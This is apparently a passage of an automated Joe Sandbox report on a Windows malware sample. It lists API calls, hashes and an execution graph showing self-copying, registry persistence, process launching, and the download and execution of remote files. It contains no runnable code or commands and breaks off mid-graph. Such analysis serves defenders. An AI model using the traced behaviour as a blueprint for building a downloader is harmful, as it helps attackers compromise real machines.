                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2223660684-0
                                                                                                                                                                                              • Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                              • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                                • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                                • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                                • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                                • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                                                                                • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                                                                                • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                              • String ID: %S%S
                                                                                                                                                                                              • API String ID: 1017111014-3267608656
                                                                                                                                                                                              • Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                              • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 528846559-507759092
                                                                                                                                                                                              • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                              • Instruction ID: afdab107b7ea46b491ba3f785a3108c34962e981a5b403661ae60ceb940f9cda
                                                                                                                                                                                              • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F11C974A04208EFDB14CF84C580B59B7B6FF49314F2081AAEC06AB381C775EE42DB95
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
                                                                                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 469056452-0
                                                                                                                                                                                              • Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                              • Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:0.1%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:1490
                                                                                                                                                                                              Total number of Limit Nodes:1
                                                                                                                                                                                              execution_graph 4456 407940 Sleep CreateMutexA GetLastError 4457 407976 ExitProcess 4456->4457 4458 40797e 6 API calls 4456->4458 4459 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4458->4459 4460 407a23 4458->4460 4462 407dcb RegOpenKeyExW 4459->4462 4463 407d9f RegSetValueExW RegCloseKey 4459->4463 4535 40f1b0 GetLocaleInfoA strcmp 4460->4535 4464 407e24 RegOpenKeyExW 4462->4464 4465 407df8 RegSetValueExW RegCloseKey 4462->4465 4463->4462 4467 407e51 RegSetValueExW RegCloseKey 4464->4467 4468 407e7d RegOpenKeyExW 4464->4468 4465->4464 4467->4468 4471 407ed6 RegOpenKeyExW 4468->4471 4472 407eaa RegSetValueExW RegCloseKey 4468->4472 4469 407a30 ExitProcess 4470 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4473 407b36 Sleep wsprintfW CopyFileW 4470->4473 4474 407a8c SetFileAttributesW RegOpenKeyExW 4470->4474 4475 407f03 RegSetValueExW RegCloseKey 4471->4475 4476 407f2f RegOpenKeyExW 4471->4476 4472->4471 4478 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4473->4478 4479 407b7e SetFileAttributesW RegOpenKeyExW 4473->4479 4474->4473 4477 407ac8 wcslen RegSetValueExW 4474->4477 4475->4476 4481 407f88 RegOpenKeyExW 4476->4481 4482 407f5c RegSetValueExW RegCloseKey 4476->4482 4483 407b29 RegCloseKey 4477->4483 4484 407afd RegCloseKey 4477->4484 4478->4459 4480 407c87 SetFileAttributesW RegOpenKeyExW 4478->4480 4479->4478 4485 407bba wcslen RegSetValueExW 4479->4485 4480->4459 4488 407cc3 wcslen RegSetValueExW 4480->4488 4490 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4481->4490 4491 40801f RegOpenKeyExW 4481->4491 4482->4481 4483->4473 4537 40f400 memset memset CreateProcessW 4484->4537 4486 407c1b RegCloseKey 4485->4486 4487 407bef RegCloseKey 4485->4487 4486->4478 4492 40f400 6 API calls 4487->4492 4493 407d24 RegCloseKey 4488->4493 4494 407cf8 RegCloseKey 4488->4494 4490->4491 4496 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4491->4496 4497 4080d9 RegOpenKeyExW 4491->4497 4498 407c08 4492->4498 4493->4459 4499 40f400 6 API calls 4494->4499 4496->4497 4501 4081f0 RegOpenKeyExW 4497->4501 4502 40810a 8 API calls 4497->4502 4498->4486 4505 407c13 ExitProcess 4498->4505 4506 407d11 4499->4506 4500 407b21 ExitProcess 4503 408221 8 API calls 4501->4503 4504 408307 Sleep 4501->4504 4502->4501 4503->4504 4542 40d180 4504->4542 4506->4493 4508 407d1c ExitProcess 4506->4508 4510 408322 9 API calls 4545 405c00 InitializeCriticalSection CreateFileW 4510->4545 5360 4077f0 4510->5360 5367 4058c0 4510->5367 5376 406f70 Sleep GetModuleFileNameW 4510->5376 4513 40848e 4517 4083d7 CreateEventA 4575 40c8b0 4517->4575 4526 40dbe0 16 API calls 4527 408438 4526->4527 4528 40dbe0 16 API calls 4527->4528 4529 408453 4528->4529 4530 40dbe0 16 API calls 4529->4530 4531 40846f 4530->4531 4618 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4531->4618 4533 408480 4627 40de90 4533->4627 4536 407a28 4535->4536 4536->4469 4536->4470 4538 40f471 ShellExecuteW 4537->4538 4539 40f462 Sleep 4537->4539 4540 407b16 4538->4540 4541 40f497 Sleep 4538->4541 4539->4540 4540->4483 4540->4500 4541->4540 4635 40d150 4542->4635 4546 405d11 4545->4546 4547 405c38 CreateFileMappingW 4545->4547 4557 40e0c0 CoInitializeEx 4546->4557 4547->4546 4548 405c59 MapViewOfFile 4547->4548 4548->4546 4549 405c78 GetFileSize 4548->4549 4553 405c8d 4549->4553 4550 405d07 UnmapViewOfFile 4550->4546 4551 405c9c 4551->4550 4553->4550 4553->4551 4554 405ccc 4553->4554 4764 40d1d0 4553->4764 4771 405d30 4553->4771 4555 40ab60 __aligned_recalloc_base 3 API calls 4554->4555 4555->4551 5075 40e190 socket 4557->5075 4559 40e168 5119 40ac80 4559->5119 4562 4083d2 4570 407390 CoInitializeEx SysAllocString 4562->4570 4563 40e0e0 4563->4559 4563->4562 4564 40e12a 4563->4564 5085 40e400 4563->5085 5100 40b430 htons 4564->5100 4569 40eef0 24 API calls 4569->4559 4571 4073b2 4570->4571 4572 4073c8 CoUninitialize 4570->4572 5264 4073e0 4571->5264 4572->4517 5273 40c870 4575->5273 4578 40c870 3 API calls 4579 40c8ce 4578->4579 4580 40c870 3 API calls 4579->4580 4581 40c8de 4580->4581 4582 40c870 3 API calls 4581->4582 4583 4083ef 4582->4583 4584 40dbb0 4583->4584 4585 40a740 7 API calls 4584->4585 4586 40dbbb 4585->4586 4587 4083f9 4586->4587 4588 40dbc7 InitializeCriticalSection 4586->4588 4589 40bc70 InitializeCriticalSection 4587->4589 4588->4587 4596 40bc8a 4589->4596 4590 40bcb9 CreateFileW 4591 40bce0 CreateFileMappingW 4590->4591 4592 40bd8e 4590->4592 4591->4592 4594 40bd01 MapViewOfFile 4591->4594 5329 40b510 EnterCriticalSection 4592->5329 4594->4592 4597 40bd1c GetFileSize 4594->4597 4596->4590 5280 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4596->5280 5281 40b850 4596->5281 4604 40bd3b 4597->4604 4598 40bda7 4600 40dbe0 16 API calls 4598->4600 4601 408403 4600->4601 4606 40dbe0 4601->4606 4602 40bd84 UnmapViewOfFile 4602->4592 4604->4602 4605 40b850 31 API calls 4604->4605 5328 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4604->5328 4605->4604 4607 40dbf7 EnterCriticalSection 4606->4607 4608 40841c 4606->4608 5356 40dcd0 4607->5356 4608->4526 4611 40dcbb LeaveCriticalSection 4611->4608 4612 40a990 9 API calls 4613 40dc39 4612->4613 4613->4611 4614 40dc4b CreateThread 4613->4614 4614->4611 4615 40dc6e 4614->4615 4616 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle 4615->4616 4617 40dcb4 4615->4617 4616->4617 4617->4611 4619 40dd86 InterlockedExchangeAdd 4618->4619 4620 40de69 GetCurrentThread SetThreadPriority 4618->4620 4619->4620 4626 40dda0 4619->4626 4620->4533 4621 40ddb9 EnterCriticalSection 4621->4626 4622 40de27 LeaveCriticalSection 4624 40de3e 4622->4624 4622->4626 4623 40de03 WaitForSingleObject 4623->4626 4624->4620 4625 40de5c Sleep 4625->4626 4626->4620 4626->4621 4626->4622 4626->4623 4626->4624 4626->4625 4628 40df12 4627->4628 4629 40de9c EnterCriticalSection 4627->4629 4628->4513 4630 40deb8 LeaveCriticalSection DeleteCriticalSection 4629->4630 4632 40ab60 __aligned_recalloc_base 3 API calls 4630->4632 4633 40df06 4632->4633 4634 40ab60 __aligned_recalloc_base 3 API calls 4633->4634 4634->4628 4638 40cda0 4635->4638 4639 40cdd3 4638->4639 4640 40cdbe 4638->4640 4642 408317 4639->4642 4670 40cf80 4639->4670 4644 40ce00 4640->4644 4642->4510 4642->4513 4645 40ceb2 4644->4645 4646 40ce29 4644->4646 4648 40a740 7 API calls 4645->4648 4669 40ceaa 4645->4669 4646->4669 4704 40a740 4646->4704 4650 40ced8 4648->4650 4652 402420 7 API calls 4650->4652 4650->4669 4654 40cf05 4652->4654 4656 4024e0 10 API calls 4654->4656 4658 40cf1f 4656->4658 4657 40ce7f 4659 402420 7 API calls 4657->4659 4660 402420 7 API calls 4658->4660 4661 40ce90 4659->4661 4662 40cf30 4660->4662 4663 4024e0 10 API calls 4661->4663 4664 4024e0 10 API calls 4662->4664 4663->4669 4665 40cf4a 4664->4665 4666 402420 7 API calls 4665->4666 4667 40cf5b 4666->4667 4668 4024e0 10 API calls 4667->4668 4668->4669 4669->4642 4671 40cfa9 4670->4671 4672 40d05a 4670->4672 4673 40d052 4671->4673 4674 40a740 7 API calls 4671->4674 4672->4673 4676 40a740 7 API calls 4672->4676 4673->4642 4675 40cfbf 4674->4675 4675->4673 4678 402420 7 API calls 4675->4678 4677 40d07e 4676->4677 4677->4673 4680 402420 7 API calls 4677->4680 4679 40cfe3 4678->4679 4681 40a740 7 API calls 4679->4681 4682 40d0a2 4680->4682 4683 40cff2 4681->4683 4684 40a740 7 API calls 4682->4684 4686 4024e0 10 API calls 4683->4686 4685 40d0b1 4684->4685 4687 4024e0 10 API calls 4685->4687 4688 40d01b 4686->4688 4690 40d0da 4687->4690 4689 40ab60 __aligned_recalloc_base 3 API calls 4688->4689 4691 40d027 4689->4691 4692 40ab60 __aligned_recalloc_base 3 API calls 4690->4692 4693 402420 7 API calls 4691->4693 4694 40d0e6 4692->4694 4695 40d038 4693->4695 4696 402420 7 API calls 4694->4696 4697 4024e0 10 API calls 4695->4697 4698 40d0f7 4696->4698 4697->4673 4699 4024e0 10 API calls 4698->4699 4700 40d111 4699->4700 4701 402420 7 API calls 4700->4701 4702 40d122 4701->4702 4703 4024e0 10 API calls 4702->4703 4703->4673 4715 40a760 4704->4715 4707 402420 4736 40a950 4707->4736 4712 4024e0 4743 402540 4712->4743 4714 4024ff __aligned_recalloc_base 4714->4657 4724 40a800 GetCurrentProcessId 4715->4724 4717 40a76b 4718 40a777 __aligned_recalloc_base 4717->4718 4725 40a820 4717->4725 4720 40a74e 4718->4720 4721 40a792 HeapAlloc 4718->4721 4720->4669 4720->4707 4721->4720 4722 40a7b9 __aligned_recalloc_base 4721->4722 4722->4720 4723 40a7d4 memset 4722->4723 4723->4720 4724->4717 4733 40a800 GetCurrentProcessId 4725->4733 4727 40a829 4728 40a846 HeapCreate 4727->4728 4734 40a890 GetProcessHeaps 4727->4734 4730 40a860 HeapSetInformation GetCurrentProcessId 4728->4730 4731 40a887 4728->4731 4730->4731 4731->4718 4733->4727 4735 40a83c 4734->4735 4735->4728 4735->4731 4737 40a760 __aligned_recalloc_base 7 API calls 4736->4737 4738 40242b 4737->4738 4739 402820 4738->4739 4740 40282a 4739->4740 4741 40a950 __aligned_recalloc_base 7 API calls 4740->4741 4742 402438 4741->4742 4742->4712 4744 402551 4743->4744 4745 40258e 4743->4745 4744->4714 4745->4744 4746 40a950 __aligned_recalloc_base 7 API calls 4745->4746 4749 4025b2 _invalid_parameter 4746->4749 4747 4025e2 memcpy 4748 402606 _invalid_parameter 4747->4748 4751 40ab60 __aligned_recalloc_base 3 API calls 4748->4751 4749->4747 4753 40ab60 4749->4753 4751->4744 4760 40a800 GetCurrentProcessId 4753->4760 4755 40ab6b 4756 4025df 4755->4756 4761 40aaa0 4755->4761 4756->4747 4759 40ab87 HeapFree 4759->4756 4760->4755 4762 40aad0 HeapValidate 4761->4762 4763 40aaf0 4761->4763 4762->4763 4763->4756 4763->4759 4781 40abd0 4764->4781 4766 40d211 4766->4553 4770 40ab60 __aligned_recalloc_base 3 API calls 4770->4766 4994 40a990 4771->4994 4774 405d6a memcpy 4776 40abd0 8 API calls 4774->4776 4775 405e28 4775->4553 4777 405da1 4776->4777 5004 40cb40 4777->5004 4782 40abfd 4781->4782 4783 40a950 __aligned_recalloc_base 7 API calls 4782->4783 4784 40ac12 4782->4784 4785 40ac14 memcpy 4782->4785 4783->4782 4784->4766 4786 40c6e0 4784->4786 4785->4782 4789 40c6ea 4786->4789 4790 40c721 memcmp 4789->4790 4791 40c748 4789->4791 4792 40ab60 __aligned_recalloc_base 3 API calls 4789->4792 4794 40c709 4789->4794 4795 40cbd0 4789->4795 4809 4084a0 4789->4809 4790->4789 4793 40ab60 __aligned_recalloc_base 3 API calls 4791->4793 4792->4789 4793->4794 4794->4766 4794->4770 4796 40cbdf __aligned_recalloc_base 4795->4796 4797 40a950 __aligned_recalloc_base 7 API calls 4796->4797 4808 40cbe9 4796->4808 4798 40cc78 4797->4798 4799 402420 7 API calls 4798->4799 4798->4808 4800 40cc8d 4799->4800 4801 402420 7 API calls 4800->4801 4802 40cc95 4801->4802 4804 40cced __aligned_recalloc_base 4802->4804 4812 40cd40 4802->4812 4817 402470 4804->4817 4807 402470 3 API calls 4807->4808 4808->4789 4925 40a6c0 4809->4925 4813 4024e0 10 API calls 4812->4813 4814 40cd54 4813->4814 4823 4026f0 4814->4823 4816 40cd6c 4816->4802 4819 402484 _invalid_parameter 4817->4819 4820 4024ce 4817->4820 4818 40ab60 __aligned_recalloc_base 3 API calls 4818->4820 4821 40ab60 __aligned_recalloc_base 3 API calls 4819->4821 4822 4024ac 4819->4822 4820->4807 4821->4822 4822->4818 4826 402710 4823->4826 4825 40270a 4825->4816 4827 402724 4826->4827 4828 402540 __aligned_recalloc_base 10 API calls 4827->4828 4829 40276d 4828->4829 4830 402540 __aligned_recalloc_base 10 API calls 4829->4830 4831 40277d 4830->4831 4832 402540 __aligned_recalloc_base 10 API calls 4831->4832 4833 40278d 4832->4833 4834 402540 __aligned_recalloc_base 10 API calls 4833->4834 4835 40279d 4834->4835 4836 4027a6 4835->4836 4837 4027cf 4835->4837 4841 403e20 4836->4841 4858 403df0 4837->4858 4840 4027c7 __aligned_recalloc_base 4840->4825 4842 402820 _invalid_parameter 7 API calls 4841->4842 4843 403e37 4842->4843 4844 402820 _invalid_parameter 7 API calls 4843->4844 4845 403e46 4844->4845 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 403e55 4846->4847 4848 402820 _invalid_parameter 7 API calls 4847->4848 4849 403e64 _invalid_parameter __aligned_recalloc_base 4848->4849 4852 40400f _invalid_parameter 4849->4852 4861 402850 4849->4861 4851 402850 _invalid_parameter 3 API calls 4851->4852 4852->4851 4853 404035 _invalid_parameter 4852->4853 4854 402850 _invalid_parameter 3 API calls 4853->4854 4855 40405b _invalid_parameter 4853->4855 4854->4853 4856 402850 _invalid_parameter 3 API calls 4855->4856 4857 404081 4855->4857 4856->4855 4857->4840 4865 404090 4858->4865 4860 403e0c 4860->4840 4862 402866 4861->4862 4863 40285b 4861->4863 4862->4849 4864 40ab60 __aligned_recalloc_base 3 API calls 4863->4864 4864->4862 4866 4040a6 _invalid_parameter 4865->4866 4867 4040dd 4866->4867 4869 4040b8 _invalid_parameter 4866->4869 4870 404103 4866->4870 4895 403ca0 4867->4895 4869->4860 4871 40413d 4870->4871 4872 40415e 4870->4872 4905 404680 4871->4905 4873 402820 _invalid_parameter 7 API calls 4872->4873 4875 40416f 4873->4875 4876 402820 _invalid_parameter 7 API calls 4875->4876 4877 40417e 4876->4877 4878 402820 _invalid_parameter 7 API calls 4877->4878 4879 40418d 4878->4879 4880 402820 _invalid_parameter 7 API calls 4879->4880 4881 40419c 4880->4881 4918 403d70 4881->4918 4883 402820 _invalid_parameter 7 API calls 4884 4041ca _invalid_parameter 4883->4884 4884->4883 4887 404284 _invalid_parameter __aligned_recalloc_base 4884->4887 4885 402850 _invalid_parameter 3 API calls 4885->4887 4886 4045a3 _invalid_parameter 4888 402850 _invalid_parameter 3 API calls 4886->4888 4889 4045c9 _invalid_parameter 4886->4889 4887->4885 4887->4886 4888->4886 4890 402850 _invalid_parameter 3 API calls 4889->4890 4891 4045ef _invalid_parameter 4889->4891 4890->4889 4892 402850 _invalid_parameter 3 API calls 4891->4892 4893 404615 _invalid_parameter 4891->4893 4892->4891 4893->4869 4894 402850 _invalid_parameter 3 API calls 4893->4894 4894->4893 4896 403cae 4895->4896 4897 402820 _invalid_parameter 7 API calls 4896->4897 4898 403ccb 4897->4898 4899 402820 _invalid_parameter 7 API calls 4898->4899 4900 403cda _invalid_parameter 4899->4900 4901 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4900->4901 4902 403d3a _invalid_parameter 4900->4902 4901->4900 4903 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4902->4903 4904 403d60 4902->4904 4903->4902 4904->4869 4906 402820 _invalid_parameter 7 API calls 4905->4906 4907 404697 4906->4907 4908 402820 _invalid_parameter 7 API calls 4907->4908 4909 4046a6 4908->4909 4910 402820 _invalid_parameter 7 API calls 4909->4910 4917 4046b5 _invalid_parameter __aligned_recalloc_base 4910->4917 4911 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4911->4917 4912 404841 _invalid_parameter 4913 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4912->4913 4914 404867 _invalid_parameter 4912->4914 4913->4912 4915 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4914->4915 4916 40488d 4914->4916 4915->4914 4916->4869 4917->4911 4917->4912 4919 402820 _invalid_parameter 7 API calls 4918->4919 4920 403d7f _invalid_parameter 4919->4920 4921 403ca0 _invalid_parameter 9 API calls 4920->4921 4922 403db8 _invalid_parameter 4921->4922 4923 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4922->4923 4924 403de3 4922->4924 4923->4922 4924->4884 4926 40a6d2 4925->4926 4929 40a620 4926->4929 4930 40a950 __aligned_recalloc_base 7 API calls 4929->4930 4937 40a630 4930->4937 4933 40ab60 __aligned_recalloc_base 3 API calls 4934 4084bf 4933->4934 4934->4789 4935 40a66c 4935->4933 4937->4934 4937->4935 4938 409b50 4937->4938 4945 40a140 4937->4945 4950 40a510 4937->4950 4939 409b63 4938->4939 4944 409b59 4938->4944 4940 409ba6 memset 4939->4940 4939->4944 4941 409bc7 4940->4941 4940->4944 4942 409bcd memcpy 4941->4942 4941->4944 4958 409920 4942->4958 4944->4937 4946 40a14d 4945->4946 4947 40a157 4945->4947 4946->4937 4947->4946 4948 40a24f memcpy 4947->4948 4963 409e70 4947->4963 4948->4947 4951 40a51c 4950->4951 4953 40a526 4950->4953 4951->4937 4952 409e70 64 API calls 4954 40a5a7 4952->4954 4953->4951 4953->4952 4954->4951 4955 409920 6 API calls 4954->4955 4956 40a5c6 4955->4956 4956->4951 4957 40a5db memcpy 4956->4957 4957->4951 4959 40996e 4958->4959 4961 40992e 4958->4961 4959->4944 4961->4959 4962 409860 6 API calls 4961->4962 4962->4961 4964 409e8a 4963->4964 4966 409e80 4963->4966 4964->4966 4973 409cb0 4964->4973 4966->4947 4968 409fc8 memcpy 4968->4966 4970 409fe7 memcpy 4971 40a111 4970->4971 4972 409e70 62 API calls 4971->4972 4972->4966 4974 409cbd 4973->4974 4975 409cc7 4973->4975 4974->4966 4974->4968 4974->4970 4975->4974 4976 409d50 4975->4976 4978 409d55 4975->4978 4979 409d38 4975->4979 4984 409610 4976->4984 4980 409920 6 API calls 4978->4980 4982 409920 6 API calls 4979->4982 4980->4976 4982->4976 4983 409dfc memset 4983->4974 4985 40961f 4984->4985 4986 409629 4984->4986 4985->4974 4985->4983 4986->4985 4987 4094e0 9 API calls 4986->4987 4988 409722 4987->4988 4989 40a950 __aligned_recalloc_base 7 API calls 4988->4989 4990 409771 4989->4990 4990->4985 4991 409350 46 API calls 4990->4991 4992 40979e 4991->4992 4993 40ab60 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4992->4993 4993->4985 5013 40a800 GetCurrentProcessId 4994->5013 4996 40a99b 4997 40a820 __aligned_recalloc_base 5 API calls 4996->4997 5002 40a9a7 __aligned_recalloc_base 4996->5002 4997->5002 4998 40aaa0 __aligned_recalloc_base HeapValidate 4998->5002 4999 40aa50 HeapAlloc 4999->5002 5000 40aa1a HeapReAlloc 5000->5002 5001 40ab60 __aligned_recalloc_base 3 API calls 5001->5002 5002->4998 5002->4999 5002->5000 5002->5001 5003 405d55 5002->5003 5003->4774 5003->4775 5007 40cb4b 5004->5007 5005 40a950 __aligned_recalloc_base 7 API calls 5005->5007 5006 405ded 5006->4775 5008 4076c0 5006->5008 5007->5005 5007->5006 5009 40a950 __aligned_recalloc_base 7 API calls 5008->5009 5010 4076d0 5009->5010 5011 407717 5010->5011 5012 4076dc memcpy CreateThread 5010->5012 5011->4775 5012->5011 5014 407720 GetTickCount srand rand Sleep 5012->5014 5013->4996 5015 4077ad 5014->5015 5021 407757 5014->5021 5016 4077ab 5015->5016 5017 40f560 58 API calls 5015->5017 5018 40ab60 __aligned_recalloc_base 3 API calls 5016->5018 5017->5016 5020 4077d8 5018->5020 5019 407766 StrChrA 5019->5021 5021->5016 5021->5019 5024 40f560 9 API calls 5021->5024 5025 40f623 InternetOpenUrlW 5024->5025 5026 40f78e InternetCloseHandle Sleep 5024->5026 5027 40f781 InternetCloseHandle 5025->5027 5028 40f652 CreateFileW 5025->5028 5029 40f7b5 6 API calls 5026->5029 5046 407795 Sleep 5026->5046 5027->5026 5030 40f681 InternetReadFile 5028->5030 5050 40f75e 5028->5050 5031 40f831 wsprintfW DeleteFileW Sleep 5029->5031 5029->5046 5032 40f6d4 wsprintfW DeleteFileW Sleep 5030->5032 5033 40f6a5 5030->5033 5034 40f240 18 API calls 5031->5034 5052 40f240 CreateFileW 5032->5052 5033->5032 5035 40f6ae WriteFile 5033->5035 5036 40f871 5034->5036 5035->5030 5038 40f87b Sleep 5036->5038 5039 40f8af DeleteFileW 5036->5039 5041 40f400 6 API calls 5038->5041 5039->5046 5043 40f892 5041->5043 5043->5046 5047 40f8a5 ExitProcess 5043->5047 5044 40f767 DeleteFileW 5044->5050 5045 40f72b Sleep 5048 40f400 6 API calls 5045->5048 5046->5021 5049 40f742 5048->5049 5049->5050 5051 40f756 ExitProcess 5049->5051 5050->5027 5053 40f285 CreateFileMappingW 5052->5053 5054 40f386 5052->5054 5053->5054 5055 40f2a6 MapViewOfFile 5053->5055 5056 40f3a0 CreateFileW 5054->5056 5057 40f3f1 5054->5057 5055->5054 5058 40f2c5 GetFileSize 5055->5058 5059 40f3c2 WriteFile 5056->5059 5060 40f3e8 5056->5060 5057->5044 5057->5045 5061 40f2e1 5058->5061 5062 40f37c UnmapViewOfFile 5058->5062 5059->5060 5063 40ab60 __aligned_recalloc_base 3 API calls 5060->5063 5072 40d1a0 5061->5072 5062->5054 5063->5057 5066 40cb40 7 API calls 5067 40f330 5066->5067 5067->5062 5068 40f34d memcmp 